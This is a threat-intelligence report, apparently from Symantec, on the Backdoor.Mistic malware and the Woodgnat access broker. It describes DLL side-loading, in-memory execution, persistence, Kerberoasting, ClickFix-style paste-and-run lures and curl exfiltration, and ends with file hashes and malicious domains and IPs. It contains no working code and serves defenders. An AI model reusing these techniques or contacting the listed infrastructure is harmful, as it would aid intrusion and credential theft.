Key findings

• Backdoor.Mistic is a new, stealthy backdoor that has been used in cybercrime intrusions since April 2026.
• Mistic was in one case deployed in close proximity to ModeloRAT, the Python-based remote access trojan (RAT) developed by Woodgnat (aka KongTuke). 
• Our Threat Hunter Team has separately observed ModeloRAT used in attacks that deployed Qilin ransomware, linking this tool to ransomware deployment. Woodgnat has been publicly linked to Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta attacks.
• Mistic was side-loaded through MpExtMs.exe, a legitimate file, and loaded from a DLL named EndpointDlp.dll, a name associated with Microsoft endpoint-security tooling. This would help the backdoor blend in with trusted software.
• The backdoor runs payloads in memory with no file written to disk and includes a kill switch that lets it delete itself, which are features consistent with an operator seeking long-term, low-visibility access.
• Targeting was opportunistic and crossed sectors, with Mistic deployed at organizations in insurance, education, IT and professional services.

A relatively new backdoor that we have called Backdoor.Mistic has been deployed in multiple attacks since April 2026. The backdoor was first documented by Zscaler (which tracks it as MLTBackdoor) earlier this month. Mistic may be linked to the financially motivated initial access broker (IAB) tracked publicly as KongTuke (which we track as Woodgnat) and it was used in one intrusion that also involved the group's ModeloRAT remote access trojan.

Woodgnat reportedly functions primarily as an IAB. Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee. The Symantec Threat Hunter Team has observed ModeloRAT being used in attacks delivering the Qilin ransomware. 

Backdoor.Mistic

Mistic was first seen in April 2026. It has been deployed on the networks of organizations in a range of sectors, including insurance, education, IT and professional services. Other ModeloRAT and Node.js activity that is likely linked to the same actors was seen at some other organizations from February 2026, but Mistic was not deployed in those incidents. The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector.

The backdoor can run remote payloads directly in memory. It also has typical backdoor capabilities, including:

• Upload/download a file
• Move/rename/delete a file
• Create a folder
• Modify the frequency with which it checks for another command
• Execute code from C2 in memory (no file saved on the disk)
• Terminate and delete itself (Kill switch)

The backdoor is launched via sideloading. In a recent attack investigated by the Symantec Threat Hunter Team, MpExtMs.exe, a legitimate file, was used to sideload malicious DLLs. A loader (version.dll) hooks GetModuleFileNameW and LoadLibraryW. The GetModuleFileNameW hook makes sure that the path mpextms.exe is pointed to the legitimate location of mpextms.exe. The LoadLibraryW hook makes sure it loads the malicious EndpointDlp.dll, which is Backdoor.Mistic. A .NET DLL is also loaded on the victim network. This is a credential stealer that displays a fake login screen. 

In addition to Mistic and ModeloRAT, other tools used in that attack included:

• Curl: Open-source command-line tool for transferring data using various network protocols.
• Reg.exe: Windows command line tool that can be used to edit the registry of local or remote computers.
• Net (net.exe): Microsoft tool that can be used to manage network resources.
• PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.
• Certutil: Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.
• WMIC (Windows Management Instrumentation): Microsoft command-line tool that can be used to execute commands on remote computers.

The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term, stealthy access for attackers. 

Woodgnat

Woodgnat is a financially motivated cybercrime operation that has been active since at least May 2024. It has been publicly linked to multiple ransomware operations, including Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta. Its malicious traffic distribution system is mainly built on compromised WordPress sites, which it uses to deliver an evolving series of social-engineering lures that trick users into executing attacker-supplied commands. 

The group is believed to gain control of these sites through a combination of vulnerable or misconfigured plugins, stolen or purchased credentials, and phishing. Injected JavaScript profiles site visitors and serves social-engineering lures that have evolved over time. 

• ClickFix (used in early 2025) - Attackers use fake error or fake CAPTCHA tests to trick users into pasting malicious scripts into the Windows Run dialog under the guise of fixing a technical error.
• FileFix (adopted in mid-2025) - Attackers trick users into manually pasting and executing malicious commands directly inside the Windows File Explorer address bar.
• CrashFix (observed in early 2026) - Attackers deliberately crash a victim’s web browser and trick them into manually executing code under the guise of “fixing” the crash.

Zscaler reported that Mistic was being delivered via a ClickFix infection chain, another low-confidence link that suggests Mistic may be linked to Woodgnat.

In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command. While the initial compromise may be opportunistic, the attackers profile the machines for potential interest to determine their value and if they can sell access to them.

Since around April 2026, Woodgnat has also been observed using helpdesk and IT-support pretexts delivered through external Microsoft Teams chats to walk targeted users through a “paste-and-run” sequence. In reported cases the operator rotated through multiple Microsoft 365 tenants over an extended period to blunt reactive blocking and reached persistent access within minutes of the victim pasting a single PowerShell command.

Woodgnat is most readily identified through its use of ModeloRAT, which is typically delivered as part of a portable WinPython package and run via a signed pythonw.exe interpreter, with persistence commonly established under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The RAT uses RC4-encrypted command-and-control (C2) communications and is built for resilience, with multiple independent C2 paths on separate infrastructure.

Other tools and components that have been reported to be used in Woodgnat attack chains include: 

• WinPython (WPy64-31401): A legitimate, signed portable Python distribution abused as the carrier and runtime for ModeloRAT. 
• Node.exe: Legitimate Node.js runtime abused as a script host to execute attacker JavaScript and chain PowerShell and Windows command-line tools. 
• Finger.exe: Living-off-the-land Windows binary abused from late 2025 to retrieve obfuscated payloads. 
• NexShield: A malicious Chrome extension impersonating uBlock Origin Lite, distributed via malvertising and used to stage the CrashFix lure. 
• GateKeeper: A .NET payload featuring layered encryption and extensive anti-analysis and victim-fingerprinting logic. 
• MintsLoader and D3F@ck Loader: Commodity loaders used to stage follow-on payloads.

Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts. The group then conducts extensive reconnaissance using built-in Windows tooling, enumerating domain users, groups, computers and sessions with net.exe, gathering host and service inventories with PowerShell, and performing Active Directory and Kerberoasting queries against accounts with service principal names to harvest crackable credentials. 

Persistence is established through several redundant mechanisms, including Run-key entries that masquerade as legitimate remote-access software, using names such as AnyDesk, Splashtop and Comms; Startup-folder shortcuts; VBScript launchers, and scheduled tasks. Data is staged and exfiltrated over HTTP using curl.exe, and the group has been observed capturing screenshots and deploying a credential stealer.

A consistent feature of Woodgnat tradecraft is an emphasis on operational resilience and evasion. The ModeloRAT toolkit has been reported to use a pool of multiple C2 servers with sequential failover and several independent access paths on separate infrastructure, while non-domain-joined victims receive a more heavily obfuscated variant that uses a domain-generation algorithm to cycle through fresh C2 domains each week. Lure and loader stages routinely profile the victim host for analysis tools and virtual-machine indicators and distinguish domain-joined corporate machines from standalone WORKGROUP hosts so that the higher-value ModeloRAT payload is reserved for enterprise targets.

Woodgnat's targeting is largely opportunistic, reflecting its role as an initial access broker. It is unclear where Woodgnat is based. The group is assessed to be a financially motivated cybercrime operation rather than a state-sponsored actor, consistent with its initial-access-broker business model and its sale of access to ransomware affiliates. 

Conclusion

The use of custom tools in ransomware attacks is becoming a more common phenomenon, with multiple examples of ransomware groups using custom exfiltration and other tools in recent times. Backdoor.Mistic appears to be a continuation of this trend, though it appears to be likely developed by access brokers working with ransomware affiliates rather than a ransomware group itself. 

The stealth of the backdoor is also notable, as is the fact that Woodgnat is also possibly behind the development of ModeloRAT, indicating a group that is quite highly skilled at the development of stealthy remote access tools. This indicates it is a group that should be actively tracked as it could continue to develop custom tools, as well as widen the pool of ransomware actors it works with. The use of custom tools by ransomware actors is also a trend to watch, as up to recent times ransomware actors preferred the use of living-off-the-land and dual-use tools, so this increased use of custom tools might point to a change in their activity too.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise (IOCs)

File indicators

1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 – Backdoor.Mistic - endpointdlp.dll
34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc - Fake lock screen - f.dll
3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be - Backdoor.Mistic - aeff97fe.msi 
59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 - Loader for backdoor - version.dll
8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 - Likely privilege escalation - n.dll
afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c - Backdoor.Mistic - endpointdlp.dll
db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 - Backdoor.Mistic - endpointdlp.dll
f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e - Backdoor.Mistic - 48b47c0.msi 
fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a - Backdoor.Mistic - endpointdlp.dll

Network indicators
142.93.242.144
144.31.53.78
198.13.159.44
199.91.221.42
authorized-logins.net
b6w9m2z5x8q1v3k.top
carrolc.com
cj06y9v4xab.com
cwrtwright.com
defs.updater-worelos.com
ftps.upd-domain-goloro.com
grande-luna.top
hxxp://thomphon.com/update.msi
human-check.top
mail.authorized-logins.net
mailes.upd-domain-goloro.com
mails.updater-worelos.com
mueleer.com
nano.upscale-kolo.com
oeannon.com
php.authorized-logins.net
rotoa-upda-lo.com
sql-updater-service.com
sss.authorized-logins.net
thomphon.com
upd-domain-goloro.com
update.update-fall.com
updater-worelos.com
upscale-kolo.com
w3xasv14culvnqj.top